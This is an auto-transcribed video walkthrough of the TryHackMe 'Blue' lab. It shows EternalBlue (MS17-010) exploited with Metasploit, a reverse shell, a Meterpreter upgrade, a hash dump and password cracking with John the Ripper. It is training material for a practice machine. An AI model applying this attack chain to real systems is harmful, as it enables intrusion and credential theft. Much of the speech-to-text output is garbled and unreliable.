1
00:00:00,710 --> 00:00:05,780
In this video, we are going to practice pen testing with a try platform for free.

2
00:00:06,830 --> 00:00:11,210
We are going to hack into one of the easiest machine on the platform called Blue.

3
00:00:11,720 --> 00:00:19,190
And we are going to follow all testing steps from scanning to exploitation, post exploitation, elevating

4
00:00:19,190 --> 00:00:21,110
privileges and exfiltration.

5
00:00:21,590 --> 00:00:27,020
If you do not have account on Hack Me, go to the platform and create an account for free, which is

6
00:00:27,020 --> 00:00:27,800
very easy.

7
00:00:28,040 --> 00:00:34,190
From the learned tab, you can search for blue machine and open it instead of using our own Kali machine.

8
00:00:34,220 --> 00:00:39,080
We are going to use the free attack box that is provided by hacking for free.

9
00:00:39,110 --> 00:00:43,520
Just click on Start Attack box and it will start in the split tab.

10
00:00:54,580 --> 00:00:58,840
You can click the button to view a tag box in fullscreen to open it in another tab.

11
00:01:03,550 --> 00:01:09,130
Once you have the attack box open in a separate tab, the first step is to scan the machine.

12
00:01:10,400 --> 00:01:11,690
Open a new terminal.

13
00:01:15,010 --> 00:01:17,170
And use the command as shown on the screen.

14
00:01:18,940 --> 00:01:24,700
We are going to use nmap the stealth scan here as represent the stealth scan.

15
00:01:24,850 --> 00:01:28,540
SC will check all default scripts against the machine.

16
00:01:29,440 --> 00:01:34,870
Is used for version enumeration and dash O will check for the operating system of the machine.

17
00:01:35,560 --> 00:01:40,780
Now you can see that a number of ports are available on the machine, including four for five, which

18
00:01:40,780 --> 00:01:43,120
we are going to target in this tutorial.

19
00:01:46,400 --> 00:01:51,200
If you scroll down, you can also see the OS version, which is Windows seven, professional service

20
00:01:51,200 --> 00:01:55,280
Pack one and the versions of other services that are running on it.

21
00:01:55,610 --> 00:01:58,400
Let's go back and try to answer some questions.

22
00:01:58,790 --> 00:02:04,010
The next question is how many ports are open with board number under 1000, which we already seen.

23
00:02:05,530 --> 00:02:07,090
Which are three in our case.

24
00:02:09,389 --> 00:02:14,400
In the next step, we can run the Vulnerability Scanner script for Nmap when the Machine.

25
00:02:15,930 --> 00:02:17,850
They use the command as shown on the screen.

26
00:02:18,760 --> 00:02:24,820
And you can see that it has told us that the machine is vulnerable to 1710 vulnerability, which is

27
00:02:24,820 --> 00:02:25,690
eternalblue.

28
00:02:27,650 --> 00:02:29,630
This pace dancer in Hackney.

29
00:02:31,570 --> 00:02:32,890
No answer is correct.

30
00:02:35,790 --> 00:02:39,840
Now, in the next section, we are going to use Metasploit to exploit this machine.

31
00:02:40,610 --> 00:02:41,880
Open a new terminal.

32
00:02:43,900 --> 00:02:45,280
And start Metasploit.

33
00:02:46,250 --> 00:02:47,960
With MSFT console command.

34
00:02:53,140 --> 00:02:54,610
No search for eternal blue.

35
00:02:54,640 --> 00:02:54,850
What?

36
00:02:54,850 --> 00:02:56,560
My 17 Dash zero ten.

37
00:02:57,660 --> 00:03:00,090
And you will see a number of modules listed.

38
00:03:01,660 --> 00:03:03,220
We are going to use the exploit.

39
00:03:03,220 --> 00:03:05,740
MZ 17 zero ten into the blue.

40
00:03:10,680 --> 00:03:13,470
Just use the common use and full name of the exploit.

41
00:03:17,170 --> 00:03:19,850
No to check the parameters that are required by the exploit.

42
00:03:19,870 --> 00:03:21,400
Give the command options.

43
00:03:25,730 --> 00:03:30,020
And you can see that we need to provide our host as a target to the exploit.

44
00:03:31,880 --> 00:03:34,190
Now if we go back to the Hackney.

45
00:03:35,380 --> 00:03:40,990
It has asked us to change the payload to Windows x 64 six Shell reverse TCP.

46
00:03:42,070 --> 00:03:43,180
Let's try to do that.

47
00:03:54,560 --> 00:03:55,450
Now go back to try.

48
00:03:56,000 --> 00:04:00,800
And the next question was what parameter we are required to set, which is our host.

49
00:04:01,730 --> 00:04:03,620
This type are host and click submit.

50
00:04:06,410 --> 00:04:07,880
No type options again.

51
00:04:08,600 --> 00:04:12,050
And set our host as our target IP.

52
00:04:12,590 --> 00:04:13,610
It said command.

53
00:04:22,890 --> 00:04:24,510
Not give the command to exploit.

54
00:04:25,800 --> 00:04:26,970
It will take a while.

55
00:04:27,880 --> 00:04:29,650
I will get the metaphysician.

56
00:04:31,120 --> 00:04:35,490
However, we were required to obtain a shell, not a matter of session.

57
00:04:35,500 --> 00:04:37,750
I think our payload has not been set.

58
00:04:37,960 --> 00:04:40,600
Just exited and set the payload again.

59
00:04:45,530 --> 00:04:46,670
These don't options.

60
00:04:46,670 --> 00:04:49,640
And we can see that our payload has been set correctly now.

61
00:04:53,270 --> 00:04:54,470
Not exploit it again.

62
00:05:01,240 --> 00:05:02,560
And we have got the shell.

63
00:05:05,810 --> 00:05:06,650
Can give the command.

64
00:05:06,680 --> 00:05:10,730
Who am I to check for the current user, which is system in this case?

65
00:05:12,560 --> 00:05:16,220
Now go back to go had me and mark the steps as completed.

66
00:05:21,690 --> 00:05:24,450
Now let's background this session with Control Z.

67
00:05:32,300 --> 00:05:34,760
You can check the active sessions with Sessions command.

68
00:05:35,240 --> 00:05:36,710
And here we have a session.

69
00:05:41,400 --> 00:05:45,180
Now, in the next step, we are going to escalate this child to interpreter.

70
00:05:47,140 --> 00:05:49,840
And we are going to use a post exploration module.

71
00:05:56,120 --> 00:05:57,710
Search for sale to my operator.

72
00:06:04,640 --> 00:06:08,240
Now use this module post multi manage sell to my operator.

73
00:06:16,130 --> 00:06:17,490
We can also give the command.

74
00:06:17,510 --> 00:06:19,760
Use zero to use that.

75
00:06:21,090 --> 00:06:22,410
You check the options?

76
00:06:23,800 --> 00:06:25,810
Where we need to provide you the session number.

77
00:06:26,930 --> 00:06:31,190
Nor give the command set session two to select the ongoing session.

78
00:06:36,770 --> 00:06:38,720
And then use the command to exploit.

79
00:06:46,460 --> 00:06:51,500
And you can see that our post module execution has been completed and a matter practice session has

80
00:06:51,500 --> 00:06:53,000
been opened in the background.

81
00:06:53,690 --> 00:06:54,500
You can check.

82
00:06:55,430 --> 00:06:56,540
With Sessions command.

83
00:07:04,050 --> 00:07:09,180
In order to open up the session, use the command sessions I three.

84
00:07:10,210 --> 00:07:14,180
We can use different metatrader commands now, such as LZ.

85
00:07:16,910 --> 00:07:19,550
Be asked to list down all running processes.

86
00:07:21,760 --> 00:07:26,410
You can also check the list of commands that are supported by Metatrader with command.

87
00:07:29,680 --> 00:07:33,670
No, let's just migrate this metadata session to an active process.

88
00:07:34,990 --> 00:07:38,860
Are going to migrate to services that in the background.

89
00:07:41,050 --> 00:07:42,910
There's no doubt it's bad.

90
00:07:49,590 --> 00:07:51,180
And use the command migrate.

91
00:07:56,250 --> 00:07:59,280
And our matter session will be moderated to the process.

92
00:08:01,130 --> 00:08:08,000
You can use the command UID to know the current user and we can also dump the hashes hash command.

93
00:08:09,410 --> 00:08:09,620
No.

94
00:08:09,620 --> 00:08:12,710
Let's go back to try and answer the questions.

95
00:08:13,100 --> 00:08:17,270
We have used Chad to make a better model to escalate our privileges.

96
00:08:20,130 --> 00:08:22,160
We were required to change the sessions.

97
00:08:22,170 --> 00:08:23,460
The Options menu.

98
00:08:29,440 --> 00:08:33,460
And mark some actions that we have already completed as completed.

99
00:08:35,830 --> 00:08:37,960
We already escalated our privileges.

100
00:08:38,559 --> 00:08:39,150
Who am I?

101
00:08:39,159 --> 00:08:39,789
Command.

102
00:08:42,289 --> 00:08:44,330
We have also migrated to another process.

103
00:08:47,240 --> 00:08:50,960
Now let's move to the next task, which is cracking some passwords.

104
00:08:52,460 --> 00:08:59,060
We have already listed the username and hashes with hash command, so the non default user is drawn

105
00:08:59,060 --> 00:08:59,930
on the machine.

106
00:09:04,050 --> 00:09:06,300
The next step, we are going to crack its hedge.

107
00:09:07,380 --> 00:09:07,920
To the copy.

108
00:09:07,920 --> 00:09:08,640
The hedge.

109
00:09:12,740 --> 00:09:15,380
Create an empty text file and paste the hash in it.

110
00:09:21,040 --> 00:09:21,190
No.

111
00:09:21,190 --> 00:09:21,850
Save it.

112
00:09:23,090 --> 00:09:25,790
We are going to use John the to create this hash.

113
00:09:26,060 --> 00:09:29,810
Right click in the folder and open the terminal in the same folder.

114
00:09:30,810 --> 00:09:36,090
So the first step is to locate the rock traditionally that is available in most of the penetration testing

115
00:09:36,090 --> 00:09:36,750
distros.

116
00:09:40,780 --> 00:09:46,120
And we have the part for all traditionally which is located in user share where you.

117
00:09:49,770 --> 00:09:52,530
Not to crack the hair, Use the command as shown on the screen.

118
00:09:52,680 --> 00:09:58,170
Specify the dictionary with dash w flag and you can see that John has grabbed our password.

119
00:10:01,640 --> 00:10:05,540
So copy this password and paste it in I the answer.

120
00:10:11,110 --> 00:10:13,180
Now the next step is to find the flags.

121
00:10:13,570 --> 00:10:19,030
There are multiple ways to do that, but we are going to search for these flags with my interpreter.

122
00:10:20,350 --> 00:10:24,130
We can use the command search within the operator to search the flags.

123
00:10:31,040 --> 00:10:31,340
We are.

124
00:10:31,340 --> 00:10:32,540
All flags are listed.

125
00:10:34,140 --> 00:10:37,860
Now let's just check the content of these flags one by one.

126
00:10:43,220 --> 00:10:44,490
I think there is a typo.

127
00:10:47,850 --> 00:10:50,730
And we have our first leg, which is the machine.

128
00:10:51,780 --> 00:10:54,120
Just go for the flag and paste it into Acme.

129
00:11:04,080 --> 00:11:06,750
Now the second flag is located in the config folder.

130
00:11:09,640 --> 00:11:10,720
Just copy the part.

131
00:11:16,460 --> 00:11:19,040
And get the contents of this flag with my Twitter.

132
00:11:20,420 --> 00:11:20,810
No.

133
00:11:20,810 --> 00:11:23,990
We may need to change the backslash in our slashes.

134
00:11:25,420 --> 00:11:25,840
This tape.

135
00:11:25,840 --> 00:11:28,360
And then we have our second flag.

136
00:11:30,250 --> 00:11:32,740
Just copy the flag and paste it into Hackney.

137
00:11:39,940 --> 00:11:41,770
No, Let's just take the third flag.

138
00:11:45,110 --> 00:11:46,910
Copy the location of the third flag.

139
00:11:48,970 --> 00:11:50,890
We did look at it in documents folder.

140
00:11:55,030 --> 00:11:56,200
Get it out with the better.

141
00:11:56,200 --> 00:11:56,710
Better.

142
00:11:57,500 --> 00:11:59,870
Seeing backlashes to forward slashes.

143
00:12:02,860 --> 00:12:03,670
And enter.

144
00:12:06,700 --> 00:12:08,910
Nor copy the flag and paste it.

145
00:12:08,950 --> 00:12:09,110
Right.

146
00:12:09,110 --> 00:12:10,060
Try again.

147
00:12:13,880 --> 00:12:14,810
The consummate.

148
00:12:21,680 --> 00:12:25,070
We think we have a question and answered this market complete.

149
00:12:27,530 --> 00:12:28,910
And we have completed the room.

150
00:12:31,370 --> 00:12:36,560
I hope you enjoyed this room and learned how to do practical testing with a practical approach.